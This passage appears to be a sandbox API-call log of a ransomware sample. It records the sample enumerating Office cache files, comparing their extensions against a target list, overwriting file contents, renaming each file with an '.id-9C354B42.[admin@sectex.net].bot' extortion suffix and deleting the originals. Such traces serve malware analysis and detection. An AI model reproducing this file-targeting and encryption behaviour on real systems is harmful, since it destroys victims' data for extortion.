	[0046.370] WriteFile (in: hFile=0x170, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0xa7dfcb0, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfcb0*=0xc0108, lpOverlapped=0x0) returned 1
	[0046.395] SetEndOfFile (hFile=0x170) returned 1
	[0046.395] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb50b818
	[0046.510] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0046.510] WriteFile (in: hFile=0x170, lpBuffer=0xb50b818*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa7dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb50b818*, lpNumberOfBytesWritten=0xa7dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0046.512] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0046.512] WriteFile (in: hFile=0x170, lpBuffer=0xb50b818*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa7dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb50b818*, lpNumberOfBytesWritten=0xa7dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0046.514] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0046.514] WriteFile (in: hFile=0x170, lpBuffer=0xb50b818*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa7dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb50b818*, lpNumberOfBytesWritten=0xa7dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0046.516] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb50b818 | out: hHeap=0x7d60000) returned 1
	[0046.516] CloseHandle (hObject=0x170) returned 1
	[0046.516] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0046.517] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77
	[0046.517] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77
	[0046.517] lstrlenW (lpString=".doc") returned 4
	[0046.517] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0046.517] lstrlenW (lpString=".docx") returned 5
	[0046.517] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1
	[0046.517] lstrlenW (lpString=".pdf") returned 4
	[0046.517] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0046.517] lstrlenW (lpString=".xls") returned 4
	[0046.517] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0046.517] lstrlenW (lpString=".xlsx") returned 5
	[0046.517] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1
	[0046.517] lstrlenW (lpString=".ppt") returned 4
	[0046.517] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0046.517] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77
	[0046.517] lstrlenW (lpString=".zip") returned 4
	[0046.517] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0046.517] lstrlenW (lpString=".rar") returned 4
	[0046.517] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0046.517] lstrlenW (lpString=".bz2") returned 4
	[0046.517] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0046.517] lstrlenW (lpString=".7z") returned 3
	[0046.517] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0046.517] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77
	[0046.517] lstrlenW (lpString=".dbf") returned 4
	[0046.517] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0046.517] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77
	[0046.517] lstrlenW (lpString=".1cd") returned 4
	[0046.517] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0046.517] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77
	[0046.517] lstrlenW (lpString=".jpg") returned 4
	[0046.517] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0046.518] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77
	[0046.518] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77
	[0046.518] lstrlenW (lpString=".doc") returned 4
	[0046.518] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0046.518] lstrlenW (lpString=".docx") returned 5
	[0046.518] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1
	[0046.518] lstrlenW (lpString=".pdf") returned 4
	[0046.518] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0046.518] lstrlenW (lpString=".xls") returned 4
	[0046.518] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0046.518] lstrlenW (lpString=".xlsx") returned 5
	[0046.518] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1
	[0046.518] lstrlenW (lpString=".ppt") returned 4
	[0046.518] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0046.518] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77
	[0046.518] lstrlenW (lpString=".zip") returned 4
	[0046.518] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0046.518] lstrlenW (lpString=".rar") returned 4
	[0046.518] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0046.518] lstrlenW (lpString=".bz2") returned 4
	[0046.518] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0046.518] lstrlenW (lpString=".7z") returned 3
	[0046.518] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0046.518] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77
	[0046.518] lstrlenW (lpString=".dbf") returned 4
	[0046.518] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0046.518] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77
	[0046.518] lstrlenW (lpString=".1cd") returned 4
	[0046.518] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0046.518] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77
	[0046.518] lstrlenW (lpString=".jpg") returned 4
	[0046.518] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0046.519] lstrcmpiW (lpString1=".xrm-ms", lpString2=".bot") returned 1
	[0046.519] lstrlenW (lpString="pkeyconfig-office.xrm-ms") returned 24
	[0046.519] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170
	[0046.519] GetFileSizeEx (in: hFile=0x170, lpFileSize=0xa7dff1c | out: lpFileSize=0xa7dff1c*=715834) returned 1
	[0046.519] CloseHandle (hObject=0x170) returned 1
	[0046.519] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 0x2020
	[0046.519] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0046.519] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170
	[0046.519] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0046.519] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0046.519] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224
	[0046.520] GetLastError () returned 0x0
	[0046.520] ReadFile (in: hFile=0x170, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0xaec3a, lpOverlapped=0x0) returned 1
	[0046.555] WriteFile (in: hFile=0x224, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xaec40, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0xaec40, lpOverlapped=0x0) returned 1
	[0046.569] ReadFile (in: hFile=0x170, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0x0, lpOverlapped=0x0) returned 1
	[0046.569] WriteFile (in: hFile=0x224, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0x104, lpOverlapped=0x0) returned 1
	[0046.569] SetEndOfFile (hFile=0x224) returned 1
	[0046.569] CloseHandle (hObject=0x224) returned 1
	[0046.569] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0046.569] SetEndOfFile (hFile=0x170) returned 1
	[0046.715] CloseHandle (hObject=0x170) returned 1
	[0046.715] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0046.715] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 1
	[0046.716] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87
	[0046.716] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87
	[0046.716] lstrlenW (lpString=".doc") returned 4
	[0046.716] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1
	[0046.716] lstrlenW (lpString=".docx") returned 5
	[0046.716] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1
	[0046.716] lstrlenW (lpString=".pdf") returned 4
	[0046.716] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1
	[0046.716] lstrlenW (lpString=".xls") returned 4
	[0046.716] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1
	[0046.716] lstrlenW (lpString=".xlsx") returned 5
	[0046.716] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1
	[0046.716] lstrlenW (lpString=".ppt") returned 4
	[0046.716] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1
	[0046.716] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87
	[0046.716] lstrlenW (lpString=".zip") returned 4
	[0046.716] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1
	[0046.716] lstrlenW (lpString=".rar") returned 4
	[0046.716] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1
	[0046.716] lstrlenW (lpString=".bz2") returned 4
	[0046.716] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1
	[0046.716] lstrlenW (lpString=".7z") returned 3
	[0046.716] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1
	[0046.716] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87
	[0046.716] lstrlenW (lpString=".dbf") returned 4
	[0046.716] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1
	[0046.716] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87
	[0046.716] lstrlenW (lpString=".1cd") returned 4
	[0046.716] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1
	[0046.716] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87
	[0046.716] lstrlenW (lpString=".jpg") returned 4
	[0046.716] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1
	[0046.717] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87
	[0046.717] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87
	[0046.717] lstrlenW (lpString=".doc") returned 4
	[0046.717] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1
	[0046.717] lstrlenW (lpString=".docx") returned 5
	[0046.717] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1
	[0046.717] lstrlenW (lpString=".pdf") returned 4
	[0046.717] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1
	[0046.717] lstrlenW (lpString=".xls") returned 4
	[0046.717] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1
	[0046.717] lstrlenW (lpString=".xlsx") returned 5
	[0046.717] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1
	[0046.717] lstrlenW (lpString=".ppt") returned 4
	[0046.717] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1
	[0046.717] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87
	[0046.717] lstrlenW (lpString=".zip") returned 4
	[0046.717] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1
	[0046.717] lstrlenW (lpString=".rar") returned 4
	[0046.717] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1
	[0046.717] lstrlenW (lpString=".bz2") returned 4
	[0046.717] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1
	[0046.717] lstrlenW (lpString=".7z") returned 3
	[0046.717] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1
	[0046.717] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87
	[0046.717] lstrlenW (lpString=".dbf") returned 4
	[0046.717] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1
	[0046.717] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87
	[0046.717] lstrlenW (lpString=".1cd") returned 4
	[0046.717] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1
	[0046.717] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87
	[0046.718] lstrlenW (lpString=".jpg") returned 4
	[0046.718] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1
	[0046.718] lstrcmpiW (lpString1=".cab", lpString2=".bot") returned 1
	[0046.718] lstrlenW (lpString="ProPrWW.cab") returned 11
	[0046.718] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218
	[0046.776] GetFileSizeEx (in: hFile=0x218, lpFileSize=0xa7dff1c | out: lpFileSize=0xa7dff1c*=177720283) returned 1
	[0046.776] CloseHandle (hObject=0x218) returned 1
	[0046.776] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab")) returned 0x2020
	[0046.776] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0046.777] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0046.777] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218
	[0046.777] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc6c | out: lpNewFilePointer=0x0) returned 1
	[0046.777] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0046.777] ReadFile (in: hFile=0x218, lpBuffer=0xb2d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa7dfc38, lpOverlapped=0x0 | out: lpBuffer=0xb2d0058*, lpNumberOfBytesRead=0xa7dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0046.786] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x387ee9e, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0046.787] ReadFile (in: hFile=0x218, lpBuffer=0xb310058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa7dfc38, lpOverlapped=0x0 | out: lpBuffer=0xb310058*, lpNumberOfBytesRead=0xa7dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0046.791] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa7dfc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0046.791] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xa93cbdb, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0046.791] ReadFile (in: hFile=0x218, lpBuffer=0xb350058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa7dfc38, lpOverlapped=0x0 | out: lpBuffer=0xb350058*, lpNumberOfBytesRead=0xa7dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0046.813] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0046.813] WriteFile (in: hFile=0x218, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0xa7dfcb0, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfcb0*=0xc0102, lpOverlapped=0x0) returned 1
	[0047.719] SetEndOfFile (hFile=0x218) returned 1
	[0047.719] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb4fb810
	[0047.719] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0047.719] WriteFile (in: hFile=0x218, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa7dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa7dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0047.720] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x387ee9e, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0047.720] WriteFile (in: hFile=0x218, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa7dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa7dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0047.721] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xa93cbdb, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0047.721] WriteFile (in: hFile=0x218, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa7dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa7dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0047.723] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4fb810 | out: hHeap=0x7d60000) returned 1
	[0047.723] CloseHandle (hObject=0x218) returned 1
	[0047.723] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0047.723] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74
	[0047.723] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74
	[0047.723] lstrlenW (lpString=".doc") returned 4
	[0047.723] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0047.723] lstrlenW (lpString=".docx") returned 5
	[0047.723] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1
	[0047.723] lstrlenW (lpString=".pdf") returned 4
	[0047.723] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0047.723] lstrlenW (lpString=".xls") returned 4
	[0047.723] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0047.723] lstrlenW (lpString=".xlsx") returned 5
	[0047.723] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1
	[0047.723] lstrlenW (lpString=".ppt") returned 4
	[0047.723] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0047.724] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74
	[0047.724] lstrlenW (lpString=".zip") returned 4
	[0047.724] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0047.724] lstrlenW (lpString=".rar") returned 4
	[0047.724] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0047.724] lstrlenW (lpString=".bz2") returned 4
	[0047.724] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0047.724] lstrlenW (lpString=".7z") returned 3
	[0047.724] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0047.724] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74
	[0047.724] lstrlenW (lpString=".dbf") returned 4
	[0047.724] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0047.724] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74
	[0047.724] lstrlenW (lpString=".1cd") returned 4
	[0047.724] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0047.724] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74
	[0047.724] lstrlenW (lpString=".jpg") returned 4
	[0047.724] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0047.724] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74
	[0047.724] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74
	[0047.724] lstrlenW (lpString=".doc") returned 4
	[0047.724] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0047.724] lstrlenW (lpString=".docx") returned 5
	[0047.724] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1
	[0047.724] lstrlenW (lpString=".pdf") returned 4
	[0047.724] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0047.724] lstrlenW (lpString=".xls") returned 4
	[0047.724] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0047.724] lstrlenW (lpString=".xlsx") returned 5
	[0047.724] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1
	[0047.724] lstrlenW (lpString=".ppt") returned 4
	[0047.724] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0047.724] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 74
	[0047.724] lstrlenW (lpString=".zip") returned 4
	[0047.724] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0047.725] lstrlenW (lpString=".rar") returned 4
	[0047.725] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0047.725] lstrlenW (lpString=".bz2") returned 4
	[0047.725] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0047.725] lstrlenW (lpString=".7z") returned 3
	[0047.725] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
